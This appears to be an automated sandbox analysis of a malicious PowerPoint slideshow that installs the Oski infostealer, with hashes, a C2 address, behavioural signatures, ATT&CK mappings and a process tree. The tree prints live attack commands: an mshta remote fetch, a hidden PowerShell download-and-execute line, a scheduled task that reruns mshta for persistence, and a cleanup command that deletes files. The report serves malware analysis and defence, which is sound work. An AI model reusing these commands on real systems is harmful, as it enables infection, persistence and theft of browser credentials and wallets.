oski | 1142a364ea5e976ec6a4ed0d4a2467f0cb4df6facfc9de46c05427908a14873d

General

Target

8013b5ae4a210f76c8064e4e9c440fc4741364e9e3e3ef3794733762e1362866.pps
Size

81KB
MD5

c4d5a9e052e1e81e33658247863a2a0e
SHA1

539f1241fe23603b64b5417317b7b69876537a24
SHA256

8013b5ae4a210f76c8064e4e9c440fc4741364e9e3e3ef3794733762e1362866
SHA512

cf9ed0c1c28d17be440d754ae191a72a0d9579948ec32d93ad7f905ff1faec032ea46b3d148267e5fb5fb4d2265cf6b1c3200d3ba436059adb971601505a0344

Score

10^/10

oski infostealer spyware

Malware Config

Extracted

Family

oski

C2

103.153.76.164/we/ahsa/

Signatures

Oski
Oski is an infostealer targeting browser data, crypto wallets.
infostealer oski

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

mshta.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	3776	568	mshta.exe	POWERPNT.EXE

Blocklisted process makes network request 16 IoCs

Processes:

mshta.exepowershell.exe

flow	pid	process
16	3776	mshta.exe
18	3776	mshta.exe
20	3776	mshta.exe
22	3776	mshta.exe
24	3776	mshta.exe
26	3776	mshta.exe
28	3776	mshta.exe
29	3776	mshta.exe
30	3776	mshta.exe
32	3776	mshta.exe
36	3776	mshta.exe
39	3776	mshta.exe
40	3776	mshta.exe
41	3776	mshta.exe
43	3776	mshta.exe
45	1984	powershell.exe

Downloads MZ/PE file
Loads dropped DLL 3 IoCs

Processes:

aspnet_compiler.exe

pid process

3264 aspnet_compiler.exe
3264 aspnet_compiler.exe
3264 aspnet_compiler.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
3264	aspnet_compiler.exe
3264	aspnet_compiler.exe
3264	aspnet_compiler.exe

Process spawned suspicious child process 1 IoCs

This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

Processes:

DW20.EXE

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	2316	568	DW20.EXE	POWERPNT.EXE

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1984 set thread context of 3264 1984 powershell.exe aspnet_compiler.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3692 3776 WerFault.exe mshta.exe

description	pid	process	target process
PID 1984 set thread context of 3264	1984	powershell.exe	aspnet_compiler.exe

pid	pid_target	process	target process
3692	3776	WerFault.exe	mshta.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

aspnet_compiler.exePOWERPNT.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	aspnet_compiler.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3976 schtasks.exe

pid	process
3976	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

3748 taskkill.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

POWERPNT.EXE

pid process

568 POWERPNT.EXE

pid	process
3748	taskkill.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

Processes:

POWERPNT.EXEdwwin.exepowershell.exeWerFault.exe

pid	process
568	POWERPNT.EXE
568	POWERPNT.EXE
2152	dwwin.exe
2152	dwwin.exe
1984	powershell.exe
1984	powershell.exe
1984	powershell.exe
3692	WerFault.exe
3692	WerFault.exe
3692	WerFault.exe
3692	WerFault.exe
3692	WerFault.exe
3692	WerFault.exe
3692	WerFault.exe
3692	WerFault.exe
3692	WerFault.exe
3692	WerFault.exe
3692	WerFault.exe
3692	WerFault.exe
3692	WerFault.exe
3692	WerFault.exe
3692	WerFault.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exeWerFault.exetaskkill.exe

description pid process

Token: SeDebugPrivilege 1984 powershell.exe
Token: SeDebugPrivilege 3692 WerFault.exe
Token: SeDebugPrivilege 3748 taskkill.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

POWERPNT.EXEmshta.exe

pid process

568 POWERPNT.EXE
3776 mshta.exe

description	pid	process
Token: SeDebugPrivilege	1984	powershell.exe
Token: SeDebugPrivilege	3692	WerFault.exe
Token: SeDebugPrivilege	3748	taskkill.exe

Suspicious use of WriteProcessMemory 25 IoCs

Processes:

POWERPNT.EXEDW20.EXEmshta.exepowershell.exeaspnet_compiler.execmd.exe

description	pid	process	target process
PID 568 wrote to memory of 3776	568	POWERPNT.EXE	mshta.exe
PID 568 wrote to memory of 3776	568	POWERPNT.EXE	mshta.exe
PID 568 wrote to memory of 2316	568	POWERPNT.EXE	DW20.EXE
PID 568 wrote to memory of 2316	568	POWERPNT.EXE	DW20.EXE
PID 2316 wrote to memory of 2152	2316	DW20.EXE	dwwin.exe
PID 2316 wrote to memory of 2152	2316	DW20.EXE	dwwin.exe
PID 3776 wrote to memory of 1984	3776	mshta.exe	powershell.exe
PID 3776 wrote to memory of 1984	3776	mshta.exe	powershell.exe
PID 3776 wrote to memory of 3976	3776	mshta.exe	schtasks.exe
PID 3776 wrote to memory of 3976	3776	mshta.exe	schtasks.exe
PID 1984 wrote to memory of 3264	1984	powershell.exe	aspnet_compiler.exe
PID 1984 wrote to memory of 3264	1984	powershell.exe	aspnet_compiler.exe
PID 1984 wrote to memory of 3264	1984	powershell.exe	aspnet_compiler.exe
PID 1984 wrote to memory of 3264	1984	powershell.exe	aspnet_compiler.exe
PID 1984 wrote to memory of 3264	1984	powershell.exe	aspnet_compiler.exe
PID 1984 wrote to memory of 3264	1984	powershell.exe	aspnet_compiler.exe
PID 1984 wrote to memory of 3264	1984	powershell.exe	aspnet_compiler.exe
PID 1984 wrote to memory of 3264	1984	powershell.exe	aspnet_compiler.exe
PID 1984 wrote to memory of 3264	1984	powershell.exe	aspnet_compiler.exe
PID 3264 wrote to memory of 4088	3264	aspnet_compiler.exe	cmd.exe
PID 3264 wrote to memory of 4088	3264	aspnet_compiler.exe	cmd.exe
PID 3264 wrote to memory of 4088	3264	aspnet_compiler.exe	cmd.exe
PID 4088 wrote to memory of 3748	4088	cmd.exe	taskkill.exe
PID 4088 wrote to memory of 3748	4088	cmd.exe	taskkill.exe
PID 4088 wrote to memory of 3748	4088	cmd.exe	taskkill.exe

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\8013b5ae4a210f76c8064e4e9c440fc4741364e9e3e3ef3794733762e1362866.pps" /ou ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:568
- C:\Windows\SYSTEM32\mshta.exe
  mshta http://www.bitly.com/bdgahsdbhmasgdkasbdagdkasgdj
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3776
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h i'E'x(iwr('https://ia801504.us.archive.org/22/items/sb_20210718/ahsan.txt') -useB);
    3⤵
    - Blocklisted process makes network request
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1984
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      #cmd
      4⤵
      Loads dropped DLL
      Checks processor information in registry
      Suspicious use of WriteProcessMemory
      PID:3264
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /pid 3264 & erase C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe & RD /S /Q C:\\ProgramData\\148990278999429\\* & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4088
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /pid 3264
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3748
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""SECOTAKSA"" /F /tr ""\""MsHtA""\""http://1230948%[email protected]/p/ahsannewone.html\""
    3⤵
    - Creates scheduled task(s)
    PID:3976
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 3776 -s 3024
    3⤵
    - Program crash
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3692
- C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE
  "C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE" -x -s 3248
  2⤵
  - Process spawned suspicious child process
  - Suspicious use of WriteProcessMemory
  PID:2316
- - C:\Windows\system32\dwwin.exe
    C:\Windows\system32\dwwin.exe -x -s 3248
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2152

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Credentials in Files

1

T1081

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Data from Local System

1

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

\ProgramData\mozglue.dll

MD5
8f73c08a9660691143661bf7332c3c27

SHA1
37fa65dd737c50fda710fdbde89e51374d0c204a

SHA256
3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

SHA512
0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

Download Submit
\ProgramData\nss3.dll

MD5
bfac4e3c5908856ba17d41edcd455a51

SHA1
8eec7e888767aa9e4cca8ff246eb2aacb9170428

SHA256
e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

SHA512
2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

Download Submit
\ProgramData\sqlite3.dll

MD5
e477a96c8f2b18d6b5c27bde49c990bf

SHA1
e980c9bf41330d1e5bd04556db4646a0210f7409

SHA256
16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660

SHA512
335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

Download Submit
memory/568-114-0x00007FFB2BCA0000-0x00007FFB2BCB0000-memory.dmp

Filesize
64KB

Download
memory/568-115-0x00007FFB2BCA0000-0x00007FFB2BCB0000-memory.dmp

Filesize
64KB

Download
memory/568-116-0x00007FFB2BCA0000-0x00007FFB2BCB0000-memory.dmp

Filesize
64KB

Download
memory/568-117-0x00007FFB2BCA0000-0x00007FFB2BCB0000-memory.dmp

Filesize
64KB

Download
memory/568-119-0x00007FFB2BCA0000-0x00007FFB2BCB0000-memory.dmp

Filesize
64KB

Download
memory/568-118-0x00007FFB4DF00000-0x00007FFB4FADD000-memory.dmp

Filesize
27.9MB

Download
memory/568-122-0x00007FFB4A510000-0x00007FFB4B5FE000-memory.dmp

Filesize
16.9MB

Download
memory/568-123-0x000002866D570000-0x000002866F465000-memory.dmp

Filesize
31.0MB

Download
memory/1984-275-0x0000021570FE0000-0x0000021570FE1000-memory.dmp

Filesize
4KB

Download
memory/1984-288-0x0000021571500000-0x00000215715EF000-memory.dmp

Filesize
956KB

Download
memory/1984-268-0x0000021570DE0000-0x0000021570DE1000-memory.dmp

Filesize
4KB

Download
memory/1984-262-0x0000000000000000-mapping.dmp

Download
memory/1984-280-0x0000021570E50000-0x0000021570E52000-memory.dmp

Filesize
8KB

Download
memory/1984-281-0x0000021570E53000-0x0000021570E55000-memory.dmp

Filesize
8KB

Download
memory/1984-282-0x0000021570E56000-0x0000021570E58000-memory.dmp

Filesize
8KB

Download
memory/2152-260-0x0000000000000000-mapping.dmp

Download
memory/2316-285-0x00007FFB2BCA0000-0x00007FFB2BCB0000-memory.dmp

Filesize
64KB

Download
memory/2316-286-0x00007FFB2BCA0000-0x00007FFB2BCB0000-memory.dmp

Filesize
64KB

Download
memory/2316-284-0x00007FFB2BCA0000-0x00007FFB2BCB0000-memory.dmp

Filesize
64KB

Download
memory/2316-283-0x00007FFB2BCA0000-0x00007FFB2BCB0000-memory.dmp

Filesize
64KB

Download
memory/2316-255-0x0000000000000000-mapping.dmp

Download
memory/3264-289-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/3264-290-0x000000000040717B-mapping.dmp

Download
memory/3264-294-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/3748-299-0x0000000000000000-mapping.dmp

Download
memory/3776-252-0x0000000000000000-mapping.dmp

Download
memory/3976-267-0x0000000000000000-mapping.dmp

Download
memory/4088-298-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads